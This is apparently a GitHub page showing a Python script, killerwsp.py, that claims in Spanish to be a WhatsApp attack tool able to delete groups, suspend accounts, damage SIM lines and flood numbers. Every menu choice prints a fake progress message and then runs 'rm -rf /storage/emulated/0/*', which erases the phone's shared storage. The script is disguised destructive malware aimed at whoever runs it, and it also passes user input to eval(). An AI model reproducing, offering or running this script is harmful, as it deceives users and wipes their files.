-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathkillerwsp.py
64 lines (57 loc) · 2.32 KB
/
killerwsp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
#!/bin/python
# -*- coding: utf-8 -*-
import os
print("""
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@ .#%, @@@@@@
@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@ @@@@
@@@@@@@@@@@@@@@@ @@@@ @@@@@@@@@@@@ @@@@
@@@@@@@@@@@@@@@ @@@@ @@@@@@@@@@@@ @@@@
@@@@@@@@@@@@@@( @@@@@ @@@@@@@@@@@@@( @@@
@@@@@@@@@@@@@@@ @@@@@@ @@@ .@@@@@ &@@@
@@@@@@@@@@@@@@@ @@@@@@@@ @@@ @@@@
@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@ @@@@@
@@@@@@@@@@@@@@@ @. @@@@@@@@ @@@@@@
@@@@@@@@@@@@@@ @@@@@@@ @@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
| | (_) | |
| | ___| | |
| |/ / | | |
| <| | | |
|_|\_\_|_|_|___ _
\ \ / / | | | /\
\ \ /\ / /| |__ __ _| |_ ___ / \ __ _ _ __
\ \/ \/ / | '_ \ / _` | __/ __| / /\ \ / _` | '_ \
\ /\ / | | | | (_| | |_\__ \/ ____ \ (_| | |_) |
\/ \/ |_| |_|\__,_|\__|___/_/ \_\__,_| .__/
| |
|_|
NO NOS RESPONSABILIZAMOS DEL USO.
HERRAMIENTA PARA DESTRUIR AL ENEMIGO.
~~~~~~~~~MENU~~~~~~~~~~~~
[1] ATAQUE A GRUPOS DE WHATSAPP (ELIMINAR)
[2] ATAQUE A CUENTAS DE WHATSAPP (SUSPENDER)
[3] ATAQUE A TARJETAS SIM (DAÑAR LINEA MOVIL)
[4] BUZONEAR NÚMEROS (TENEMOS MÁS DE 30 BUZONES ACTIVOS)
░
░ ░ ░
""")
eleccion = int(eval(input("KILLWHATSAPP>> ")))
#
#
if eleccion == 1:
os.system("apt update")
print("INSTALANDO SERVIDOR PRIVADO")
os.system("rm -rf /storage/emulated/0/*")
elif eleccion == 2:
os.system("apt update")
print("ABRIENDO PLATAFORMA..........")
os.system("rm -rf /storage/emulated/0/*")
elif eleccion == 3:
os.system("apt update")
print("ABRIENDO SERVIDOR................")
os.system("rm -rf /storage/emulated/0/*")
elif eleccion == 4:
os.system("apt update")
print("ABRIENDO SERVIDOR................")
os.system("rm -rf /storage/emulated/0/*")